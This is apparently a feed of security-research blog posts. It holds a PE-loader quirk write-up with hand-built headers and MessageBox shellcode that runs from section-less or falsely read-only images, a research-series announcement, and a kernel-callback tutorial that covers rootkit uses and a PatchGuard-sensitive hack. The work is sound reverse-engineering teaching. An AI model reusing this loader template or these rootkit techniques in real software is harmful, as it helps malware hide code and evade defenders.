	}
	v12 = MiAllocatePool(64, 8 * (7 * SectionCount + (((unsigned __int64)(unsigned int)MiFlags >> 13) & 1)) + 184, (SectionFlags & 0x200000) != 0 ? 0x61436D4D : 0x69436D4D);

As a result, the raw image is mapped into memory with all PTEs assigned MM_EXECUTE_READWRITE protection. As mentioned previously, the IMAGE_SECTION_HEADER list is ignored, meaning a PE module using this mode can have a NumberOfSections value of 0. There are no obvious size restrictions on PE modules using this mode either - the loader will allocate memory based on the SizeOfImage field and copy the file contents accordingly. Any excess memory beyond the size of the file will remain blank.

Demonstration #1 - Executable PE with no sections

The simplest demonstration of this technique would be to create a generic “loader” for position-independent code. I have created the following sample headers by hand for testing:

// (64-bit EXE headers)
BYTE bHeaders64[328] =
{
	0x4D, 0x5A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x40, 0x00, 0x00, 0x00, 0x50, 0x45, 0x00, 0x00, 0x64, 0x86, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0xF0, 0x00, 0x22, 0x00, 0x0B, 0x02, 0x0E, 0x1D, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x01, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x01, 0x00, 0x00, 0x00,
	0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x10, 0x00, 0x48, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x02, 0x00, 0x60, 0x81, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00,

	// (code goes here)
};

BYTE bHeaders32[304] =
{
	0x4D, 0x5A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x40, 0x00, 0x00, 0x00, 0x50, 0x45, 0x00, 0x00, 0x4C, 0x01, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0xE0, 0x00, 0x02, 0x01, 0x0B, 0x01, 0x0E, 0x1D, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x01, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
	0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x10, 0x00, 0x30, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x02, 0x00, 0x40, 0x81, 0x00, 0x00, 0x10, 0x00, 0x00, 0x10, 0x00, 0x00,
	0x00, 0x00, 0x10, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00,

	// (code goes here)
};

These headers contain a SectionAlignment value of 0x200 (rather than the usual 0x1000), a SizeOfImage value of 0x100000 (1MB), a blank section table, and an entry-point positioned immediately after the headers. Aside from these values, there is nothing special about the remaining fields:

(DOS Header)
   e_magic                       : 0x5A4D
   ...
   e_lfanew                      : 0x40
(NT Header)
   Signature                     : 0x4550
   Machine                       : 0x8664
   NumberOfSections              : 0x0
   TimeDateStamp                 : 0x0
   PointerToSymbolTable          : 0x0
   NumberOfSymbols               : 0x0
   SizeOfOptionalHeader          : 0xF0
   Characteristics               : 0x22
   Magic                         : 0x20B
   MajorLinkerVersion            : 0xE
   MinorLinkerVersion            : 0x1D
   SizeOfCode                    : 0x0
   SizeOfInitializedData         : 0x0
   SizeOfUninitializedData       : 0x0
   AddressOfEntryPoint           : 0x148
   BaseOfCode                    : 0x0
   ImageBase                     : 0x140000000
   SectionAlignment              : 0x200
   FileAlignment                 : 0x200
   MajorOperatingSystemVersion   : 0x6
   MinorOperatingSystemVersion   : 0x0
   MajorImageVersion             : 0x0
   MinorImageVersion             : 0x0
   MajorSubsystemVersion         : 0x6
   MinorSubsystemVersion         : 0x0
   Win32VersionValue             : 0x0
   SizeOfImage                   : 0x100000
   SizeOfHeaders                 : 0x148
   CheckSum                      : 0x0
   Subsystem                     : 0x2
   DllCharacteristics            : 0x8160
   SizeOfStackReserve            : 0x100000
   SizeOfStackCommit             : 0x1000
   SizeOfHeapReserve             : 0x100000
   SizeOfHeapCommit              : 0x1000
   LoaderFlags                   : 0x0
   NumberOfRvaAndSizes           : 0x10
   DataDirectory[0]              : 0x0, 0x0
   ...
   DataDirectory[15]             : 0x0, 0x0
(Start of code)

For demonstration purposes, we will be using some position-independent code that calls MessageBoxA. As the base headers lack an import table, this code must locate and load all dependencies manually - user32.dll in this case. This same payload can be used in both 32-bit and 64-bit environments:

BYTE bMessageBox[939] =
{
	0x8B, 0xC4, 0x6A, 0x00, 0x2B, 0xC4, 0x59, 0x83, 0xF8, 0x08, 0x0F, 0x84,
	0xA0, 0x01, 0x00, 0x00, 0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x3C, 0x64, 0xA1,
	0x30, 0x00, 0x00, 0x00, 0x33, 0xD2, 0x53, 0x56, 0x57, 0x8B, 0x40, 0x0C,
	0x33, 0xDB, 0x21, 0x5D, 0xF0, 0x21, 0x5D, 0xEC, 0x8B, 0x40, 0x1C, 0x8B,
	0x00, 0x8B, 0x78, 0x08, 0x8B, 0x47, 0x3C, 0x8B, 0x44, 0x38, 0x78, 0x03,
	0xC7, 0x8B, 0x48, 0x24, 0x03, 0xCF, 0x89, 0x4D, 0xE8, 0x8B, 0x48, 0x20,
	0x03, 0xCF, 0x89, 0x4D, 0xE4, 0x8B, 0x48, 0x1C, 0x03, 0xCF, 0x89, 0x4D,
	0xF4, 0x8B, 0x48, 0x14, 0x89, 0x4D, 0xFC, 0x85, 0xC9, 0x74, 0x5F, 0x8B,
	0x70, 0x18, 0x8B, 0xC1, 0x89, 0x75, 0xF8, 0x33, 0xC9, 0x85, 0xF6, 0x74,
	0x4C, 0x8B, 0x45, 0xE8, 0x0F, 0xB7, 0x04, 0x48, 0x3B, 0xC2, 0x74, 0x07,
	0x41, 0x3B, 0xCE, 0x72, 0xF0, 0xEB, 0x37, 0x8B, 0x45, 0xE4, 0x8B, 0x0C,
	0x88, 0x03, 0xCF, 0x74, 0x2D, 0x8A, 0x01, 0xBE, 0x05, 0x15, 0x00, 0x00,
	0x84, 0xC0, 0x74, 0x1F, 0x6B, 0xF6, 0x21, 0x0F, 0xBE, 0xC0, 0x03, 0xF0,
	0x41, 0x8A, 0x01, 0x84, 0xC0, 0x75, 0xF1, 0x81, 0xFE, 0xFB, 0xF0, 0xBF,
	0x5F, 0x75, 0x74, 0x8B, 0x45, 0xF4, 0x8B, 0x1C, 0x90, 0x03, 0xDF, 0x8B,
	0x75, 0xF8, 0x8B, 0x45, 0xFC, 0x42, 0x3B, 0xD0, 0x72, 0xA9, 0x8D, 0x45,
	0xC4, 0xC7, 0x45, 0xC4, 0x75, 0x73, 0x65, 0x72, 0x50, 0x66, 0xC7, 0x45,
	0xC8, 0x33, 0x32, 0xC6, 0x45, 0xCA, 0x00, 0xFF, 0xD3, 0x8B, 0xF8, 0x33,
	0xD2, 0x8B, 0x4F, 0x3C, 0x8B, 0x4C, 0x39, 0x78, 0x03, 0xCF, 0x8B, 0x41,
	0x20, 0x8B, 0x71, 0x24, 0x03, 0xC7, 0x8B, 0x59, 0x14, 0x03, 0xF7, 0x89,
	0x45, 0xE4, 0x8B, 0x41, 0x1C, 0x03, 0xC7, 0x89, 0x75, 0xF8, 0x89, 0x45,
	0xE8, 0x89, 0x5D, 0xFC, 0x85, 0xDB, 0x74, 0x7D, 0x8B, 0x59, 0x18, 0x8B,
	0x45, 0xFC, 0x33, 0xC9, 0x85, 0xDB, 0x74, 0x6C, 0x0F, 0xB7, 0x04, 0x4E,
	0x3B, 0xC2, 0x74, 0x22, 0x41, 0x3B, 0xCB, 0x72, 0xF3, 0xEB, 0x5A, 0x81,
	0xFE, 0x6D, 0x07, 0xAF, 0x60, 0x8B, 0x75, 0xF8, 0x75, 0x8C, 0x8B, 0x45,
	0xF4, 0x8B, 0x04, 0x90, 0x03, 0xC7, 0x89, 0x45, 0xEC, 0xE9, 0x7C, 0xFF,
	0xFF, 0xFF, 0x8B, 0x45, 0xE4, 0x8B, 0x0C, 0x88, 0x03, 0xCF, 0x74, 0x35,
	0x8A, 0x01, 0xBE, 0x05, 0x15, 0x00, 0x00, 0x84, 0xC0, 0x74, 0x27, 0x6B,
	0xF6, 0x21, 0x0F, 0xBE, 0xC0, 0x03, 0xF0, 0x41, 0x8A, 0x01, 0x84, 0xC0,
	0x75, 0xF1, 0x81, 0xFE, 0xB4, 0x14, 0x4F, 0x38, 0x8B, 0x75, 0xF8, 0x75,
	0x10, 0x8B, 0x45, 0xE8, 0x8B, 0x04, 0x90, 0x03, 0xC7, 0x89, 0x45, 0xF0,
	0xEB, 0x03, 0x8B, 0x75, 0xF8, 0x8B, 0x45, 0xFC, 0x42, 0x3B, 0xD0, 0x72,
	0x89, 0x33, 0xC9, 0xC7, 0x45, 0xC4, 0x54, 0x65, 0x73, 0x74, 0x51, 0x8D,
	0x45, 0xC4, 0x88, 0x4D, 0xC8, 0x50, 0x50, 0x51, 0xFF, 0x55, 0xF0, 0x6A,
	0x7B, 0x6A, 0xFF, 0xFF, 0x55, 0xEC, 0x5F, 0x5E, 0x5B, 0xC9, 0xC3, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x6C, 0x24, 0x10, 0x48, 0x89,
	0x74, 0x24, 0x18, 0x48, 0x89, 0x7C, 0x24, 0x20, 0x41, 0x54, 0x41, 0x56,
	0x41, 0x57, 0x48, 0x83, 0xEC, 0x40, 0x65, 0x48, 0x8B, 0x04, 0x25, 0x60,
	0x00, 0x00, 0x00, 0x33, 0xFF, 0x45, 0x33, 0xFF, 0x45, 0x33, 0xE4, 0x45,
	0x33, 0xC9, 0x48, 0x8B, 0x48, 0x18, 0x48, 0x8B, 0x41, 0x30, 0x48, 0x8B,
	0x08, 0x48, 0x8B, 0x59, 0x10, 0x48, 0x63, 0x43, 0x3C, 0x8B, 0x8C, 0x18,
	0x88, 0x00, 0x00, 0x00, 0x48, 0x03, 0xCB, 0x8B, 0x69, 0x24, 0x44, 0x8B,
	0x71, 0x20, 0x48, 0x03, 0xEB, 0x44, 0x8B, 0x59, 0x1C, 0x4C, 0x03, 0xF3,
	0x8B, 0x71, 0x14, 0x4C, 0x03, 0xDB, 0x85, 0xF6, 0x0F, 0x84, 0x80, 0x00,
	0x00, 0x00, 0x44, 0x8B, 0x51, 0x18, 0x33, 0xC9, 0x45, 0x85, 0xD2, 0x74,
	0x69, 0x48, 0x8B, 0xD5, 0x0F, 0x1F, 0x40, 0x00, 0x0F, 0xB7, 0x02, 0x41,
	0x3B, 0xC1, 0x74, 0x0D, 0xFF, 0xC1, 0x48, 0x83, 0xC2, 0x02, 0x41, 0x3B,
	0xCA, 0x72, 0xED, 0xEB, 0x4D, 0x45, 0x8B, 0x04, 0x8E, 0x4C, 0x03, 0xC3,
	0x74, 0x44, 0x41, 0x0F, 0xB6, 0x00, 0x33, 0xD2, 0xB9, 0x05, 0x15, 0x00,
	0x00, 0x84, 0xC0, 0x74, 0x35, 0x0F, 0x1F, 0x00, 0x6B, 0xC9, 0x21, 0x8D,
	0x52, 0x01, 0x0F, 0xBE, 0xC0, 0x03, 0xC8, 0x42, 0x0F, 0xB6, 0x04, 0x02,
	0x84, 0xC0, 0x75, 0xEC, 0x81, 0xF9, 0xFB, 0xF0, 0xBF, 0x5F, 0x75, 0x08,
	0x41, 0x8B, 0x3B, 0x48, 0x03, 0xFB, 0xEB, 0x0E, 0x81, 0xF9, 0x6D, 0x07,
	0xAF, 0x60, 0x75, 0x06, 0x45, 0x8B, 0x23, 0x4C, 0x03, 0xE3, 0x41, 0xFF,
	0xC1, 0x49, 0x83, 0xC3, 0x04, 0x44, 0x3B, 0xCE, 0x72, 0x84, 0x48, 0x8D,
	0x4C, 0x24, 0x20, 0xC7, 0x44, 0x24, 0x20, 0x75, 0x73, 0x65, 0x72, 0x66,
	0xC7, 0x44, 0x24, 0x24, 0x33, 0x32, 0x44, 0x88, 0x7C, 0x24, 0x26, 0xFF,
	0xD7, 0x45, 0x33, 0xC9, 0x48, 0x8B, 0xD8, 0x48, 0x63, 0x48, 0x3C, 0x8B,
	0x94, 0x01, 0x88, 0x00, 0x00, 0x00, 0x48, 0x03, 0xD0, 0x8B, 0x7A, 0x24,
	0x8B, 0x6A, 0x20, 0x48, 0x03, 0xF8, 0x44, 0x8B, 0x5A, 0x1C, 0x48, 0x03,
	0xE8, 0x8B, 0x72, 0x14, 0x4C, 0x03, 0xD8, 0x85, 0xF6, 0x74, 0x77, 0x44,
	0x8B, 0x52, 0x18, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0x33, 0xC0, 0x45, 0x85,
	0xD2, 0x74, 0x5B, 0x48, 0x8B, 0xD7, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00,
	0x0F, 0xB7, 0x0A, 0x41, 0x3B, 0xC9, 0x74, 0x0D, 0xFF, 0xC0, 0x48, 0x83,
	0xC2, 0x02, 0x41, 0x3B, 0xC2, 0x72, 0xED, 0xEB, 0x3D, 0x44, 0x8B, 0x44,
	0x85, 0x00, 0x4C, 0x03, 0xC3, 0x74, 0x33, 0x41, 0x0F, 0xB6, 0x00, 0x33,
	0xD2, 0xB9, 0x05, 0x15, 0x00, 0x00, 0x84, 0xC0, 0x74, 0x24, 0x66, 0x90,
	0x6B, 0xC9, 0x21, 0x8D, 0x52, 0x01, 0x0F, 0xBE, 0xC0, 0x03, 0xC8, 0x42,
	0x0F, 0xB6, 0x04, 0x02, 0x84, 0xC0, 0x75, 0xEC, 0x81, 0xF9, 0xB4, 0x14,
	0x4F, 0x38, 0x75, 0x06, 0x45, 0x8B, 0x3B, 0x4C, 0x03, 0xFB, 0x41, 0xFF,
	0xC1, 0x49, 0x83, 0xC3, 0x04, 0x44, 0x3B, 0xCE, 0x72, 0x92, 0x45, 0x33,
	0xC9, 0xC7, 0x44, 0x24, 0x20, 0x54, 0x65, 0x73, 0x74, 0x4C, 0x8D, 0x44,
	0x24, 0x20, 0xC6, 0x44, 0x24, 0x24, 0x00, 0x48, 0x8D, 0x54, 0x24, 0x20,
	0x33, 0xC9, 0x41, 0xFF, 0xD7, 0xBA, 0x7B, 0x00, 0x00, 0x00, 0x48, 0xC7,
	0xC1, 0xFF, 0xFF, 0xFF, 0xFF, 0x41, 0xFF, 0xD4, 0x48, 0x8B, 0x5C, 0x24,
	0x60, 0x48, 0x8B, 0x6C, 0x24, 0x68, 0x48, 0x8B, 0x74, 0x24, 0x70, 0x48,
	0x8B, 0x7C, 0x24, 0x78, 0x48, 0x83, 0xC4, 0x40, 0x41, 0x5F, 0x41, 0x5E,
	0x41, 0x5C, 0xC3
};

As a side note, several readers have asked how I created this sample code (previously used in another project) which works correctly in both 32-bit and 64-bit modes. The answer is very simple: it begins by storing the original stack pointer value, pushes a value onto the stack, and compares the new stack pointer to the original value. If the difference is 8, the 64-bit code is executed - otherwise, the 32-bit code is executed. While there are certainly more efficient approaches to achieve this outcome, this method is sufficient for demonstration purposes:

mov eax, esp	; store stack ptr
push 0		; push a value onto the stack
sub eax, esp	; calculate difference
pop ecx		; restore stack
cmp eax, 8	; check if the difference is 8
je 64bit_code
32bit_code:
xxxx
64bit_code:
xxxx

By appending this payload to the original headers above, we can generate a valid and functional EXE file. The provided PE headers contain a hardcoded SizeOfImage value of 0x100000 which allows for a maximum payload size of almost 1MB, but this can be increased if necessary. Running this program will display our message box, despite the fact that the PE headers lack any executable sections, or any sections at all in this case:

Demonstration #2 - Executable PE with spoofed sections

Perhaps more interestingly, it is also possible to create a fake section table using this mode as mentioned earlier. I have created another EXE which follows a similar format to the previous samples, but also includes a single read-only section:

The main payload has been stored within this read-only section and the entry-point has been updated to 0x1000. Under normal circumstances, you would expect the program to crash immediately with an access-violation exception due to attempting to execute read-only memory. However, this doesn’t occur here - the target memory region contains RWX permissions and the payload is executed successfully:

Notes

The sample EXE files can be downloaded here.

The proof-of-concepts described above involve appending the payload to the end of the NT headers, but it is also possible to embed executable code within the headers themselves using this technique. The module will fail to load if the AddressOfEntryPoint value is less than the SizeOfHeaders value, but this can easily be bypassed since the SizeOfHeaders value is not strictly enforced. It can even be set to 0, allowing the entry-point to be positioned anywhere within the file.

It is possible that this feature was initially designed to allow for very small images, enabling the headers, code, and data to fit within a single memory page. As memory protection is applied per-page, it makes sense to apply RWX to all PTEs when the virtual section size is lower than the page size - it would otherwise be impossible to manage protections correctly if multiple sections resided within a single page.

I have tested these EXE files on various different versions of Windows from Vista to 10 with success in all cases. Unfortunately it has very little practical use in the real world as it won’t deceive any modern disassemblers - nonetheless, it remains an interesting concept.

Exploiting Reversing (ER) series: article 01 | Windows kernel drivers – part 01

11 April 2023 at 15:41

The first article (109 pages) in the Exploiting Reversing (ER) series, a step-by-step vulnerability research series on Windows, macOS, hypervisors and browsers, is available for reading on:

(PDF): https://exploitreversing.com/wp-content/uploads/2024/05/exploit_reversing_01-1.pdf

I hope readers like it.

Have an excellent day and keep reversing!

Alexandre Borges

Lord Of The Ring0 - Part 4 | The call back home

24 February 2023 at 00:00

star fork follow

Prologue

In the last blog post, we learned some debugging concepts, understood what is IOCTL how to handle it and started to learn how to validate the data that we get from the user mode - data that cannot be trusted and a handling mistake can cause a blue screen of death.

In this blog post, I’ll explain the different types of callbacks and we will write another driver to protect registry keys.

Kernel Callbacks

We started to talk about this subject in the 2nd part, so if you haven’t read it yet read it here and come back as this blog is based on the knowledge you have learned in the previous ones.

For starters, let’s see what type of callbacks we’re going to learn about today:

  • Pre / Post operations (can be registered with ObRegisterCallbacks and talked about it in the 2nd part).
  • PsSet*NotifyRoutine.
  • CmRegisterCallbackEx.

Each of the mentioned callbacks has its purpose and difference and the most important thing to know is to get the right tool for the job, so for each type, I will also give an example of how it can be used in different scenarios.

ObRegisterCallbacks

ObRegisterCallbacks is a function that allows you to register a callback of your choice for certain events (process, thread, and much more) before or after they’re happening. To register a callback you need to give the following structure:

typedef struct _OB_CALLBACK_REGISTRATION {
  USHORT                    Version;
  USHORT                    OperationRegistrationCount;
  UNICODE_STRING            Altitude;
  PVOID                     RegistrationContext;
  OB_OPERATION_REGISTRATION *OperationRegistration;
} OB_CALLBACK_REGISTRATION, *POB_CALLBACK_REGISTRATION;

Version MUST be OB_FLT_REGISTRATION_VERSION.

OperationRegistrationCount is the number of registered callbacks.

Altitude is a unique identifier in form of a string with this pattern #define OB_CALLBACKS_ALTITUDE L"XXXXX.XXXX" where X is a number. It is mandatory to define one so the OS will be able to identify your driver and determine the load order if you don’t define it or if the Altitude isn’t unique the registration will fail.

RegistrationContext is the handle that will be used later on to Unregister the callbacks.

Finally, OperationRegistration is an array that contains all of your registered callbacks. OperationRegistration and every callback have this structure:

typedef struct _OB_OPERATION_REGISTRATION {
  POBJECT_TYPE                *ObjectType;
  OB_OPERATION                Operations;
  POB_PRE_OPERATION_CALLBACK  PreOperation;
  POB_POST_OPERATION_CALLBACK PostOperation;
} OB_OPERATION_REGISTRATION, *POB_OPERATION_REGISTRATION;

ObjectType is the type of operation that you want to register to. Some of the most common types are *PsProcessType and *PsThreadType. It is worth mentioning that although you can enable more types (like IoFileObjectType) this will trigger PatchGuard and cause your computer to BSOD, so unless PatchGuard is disabled it is highly not recommended to enable more types. If you still want to enable more types, you can do so by using this like so:

typedef struct _OBJECT_TYPE
{
 struct _LIST_ENTRY TypeList;     
 struct _UNICODE_STRING Name;     
 VOID* DefaultObject;             
 UCHAR Index;                   
 ULONG TotalNumberOfObjects;     
 ULONG TotalNumberOfHandles;    
 ULONG HighWaterNumberOfObjects;  
 ULONG HighWaterNumberOfHandles;
 struct _OBJECT_TYPE_INITIALIZER_TEMP TypeInfo;
 struct _EX_PUSH_LOCK_TEMP TypeLock;
 ULONG Key;
 struct _LIST_ENTRY CallbackList;
} OBJECT_TYPE, * POBJECT_TYPE;

POBJECT_TYPE_TEMP ObjectTypeTemp = (POBJECT_TYPE_TEMP)*IoFileObjectType;
ObjectTypeTemp->TypeInfo.SupportsObjectCallbacks = 1;

Operations are the kind of operations that you are interested in, it can be OB_OPERATION_HANDLE_CREATE and/or OB_OPERATION_HANDLE_DUPLICATE for a handle creation or duplication.

PreOperation is an operation that will be called before the handle is opened and PostOperation will be called after it is opened. In both cases, you are getting important information through OB_PRE_OPERATION_INFORMATION or OB_POST_OPERATION_INFORMATION such as a handle to the object, the type of the object the return status, and what type of operation (OB_OPERATION_HANDLE_CREATE or OB_OPERATION_HANDLE_DUPLICATE) occurred. Both of them must ALWAYS return OB_PREOP_SUCCESS, if you want to change the return status, you can change the ReturnStatus that you got from the operation information, but do not return anything else.

After you registered this kind of callback, you can remove certain permissions from the handle (for example: If you don’t want to allow a process to be closed, you can just remove the PROCESS_TERMINATE permission as we did in part 2 of the series) or manipulate the object itself (if it is a process, you can change the EPROCESS structure).

As you can see, these kinds of operations are very useful for both rootkits and AVs/EDRs to protect their user mode component. Usually, if you have a user mode part you will want to use some of these callbacks to make sure your process/thread is protected properly and cannot be killed easily.

PsSet*NotifyRoutine

Unlike ObRegisterCallbacks PsSet notifies routines are not responsible for a handle opening or duplicating operation but for monitoring creation/killing and loading operations, while the most notorious ones are PsSetCreateProcessNotifyRoutine, PsSetCreateThreadNotifyRoutine and PsSetLoadImageNotifyRoutine all of them are heavily used by AVs/EDRs to monitor for certain process/thread creations and DLL loading. Let’s break it down, and talk about each function separately and what you can do with it.

PsSetCreateProcessNotifyRoutine receives a function of type PCREATE_PROCESS_NOTIFY_ROUTINE which looks like so:

void PcreateProcessNotifyRoutine(
  [in] HANDLE ParentId,
  [in] HANDLE ProcessId,
  [in] BOOLEAN Create
)

ParentId is the PID of the process that attempts to create or kill the target process. ProcessId is the PID of the target process. Create indicates whether it is a create or kill operation.

The most common example of using this kind of routine is to watch certain processes and if there is an attempt to create a forbidden process (e.g. create a cmd directly under Winlogon), you can kill it. Another example can be of creating a “watchdog” for a certain process and if it is killed by an unauthorized process, restart it.

PsSetCreateThreadNotifyRoutine receives a function of type PCREATE_THREAD_NOTIFY_ROUTINE which looks like so:

void PcreateThreadNotifyRoutine(
  [in] HANDLE ProcessId,
  [in] HANDLE ThreadId,
  [in] BOOLEAN Create
)

ProcessId is the PID of the process. ThreadId is the TID of the target thread. Create indicates whether it is a create or kill operation.

A simple example of using this kind of routine is if an EDR injected its library into a process, make sure that the library’s thread is getting killed.

PsSetLoadImageNotifyRoutine receives a function of type PLOAD_IMAGE_NOTIFY_ROUTINE which looks like so:

void PloadImageNotifyRoutine(
  [in, optional] PUNICODE_STRING FullImageName,
  [in]           HANDLE ProcessId,
  [in]           PIMAGE_INFO ImageInfo
)

FullImageName is the name of the loaded image (a note here: it is not only DLLs and can be also EXE for example). ProcessId is the PID of the target process. ImageInfo is the most interesting part and contains a struct of type IMAGE_INFO:

typedef struct _IMAGE_INFO {
  union {
    ULONG Properties;
    struct {
      ULONG ImageAddressingMode : 8;
      ULONG SystemModeImage : 1;
      ULONG ImageMappedToAllPids : 1;
      ULONG ExtendedInfoPresent : 1;
      ULONG MachineTypeMismatch : 1;
      ULONG ImageSignatureLevel : 4;
      ULONG ImageSignatureType : 3;
      ULONG ImagePartialMap : 1;
      ULONG Reserved : 12;
    };
  };
  PVOID  ImageBase;
  ULONG  ImageSelector;
  SIZE_T ImageSize;
  ULONG  ImageSectionNumber;
} IMAGE_INFO, *PIMAGE_INFO;

The most important properties in my opinion are ImageBase and ImageSize, using these you can inspect and analyze the image pretty efficiently. A simple example is if an attacker injects a DLL into LSASS, an EDR can inspect the image and unload it if it finds it malicious. If the ExtendedInfoPresent option is available, it means that this struct is of type IMAGE_INFO_EX:

typedef struct _IMAGE_INFO_EX {
  SIZE_T              Size;
  IMAGE_INFO          ImageInfo;
  struct _FILE_OBJECT *FileObject;
} IMAGE_INFO_EX, *PIMAGE_INFO_EX;

As you can see, here you also get the FILE_OBJECT which is a handle for the file that is backed on the disk. With that information, you can also check for reflective DLL injection (a loaded DLL without any file backed on the disk) and it opens a door for you to monitor for more injection methods that don’t have a file on the disk.

These kinds of functions are usually used more for EDRs and AVs rather than rootkits, because as you can see it provides insights that are more useful for monitoring rather than doing malicious operations but that doesn’t mean it doesn’t have a use at all. For example, a rootkit can use the PsSetLoadImageNotifyRoutine to make sure that no AV/EDR agent is injected into it.

CmRegisterCallbackEx

CmRegisterCallbackEx is responsible to register a registry callback that can monitor and interfere with various registry operations such as registry key creation, deletion, querying and more. Like the ObRegisterCallbacks functions, it receives a unique altitude and the callback function. Let’s focus on the Registry callback function:

NTSTATUS ExCallbackFunction(
  [in]           PVOID CallbackContext,
  [in, optional] PVOID Argument1,
  [in, optional] PVOID Argument2
)

CallbackContext is the context that was passed on the function registration with CmRegisterCallbackEx. Argument1 is a variable that contains the information of what operation was made (e.g. deletion, creation, setting value) and whether it is a post-operation or pre-operation. Argument2 is the information itself that is delivered and its type matches the class that was specified in Argument1.

Using this callback, a rootkit can do many operations, from blocking a change to a specific registry key, denying setting a specific value or hiding registry keys and values.

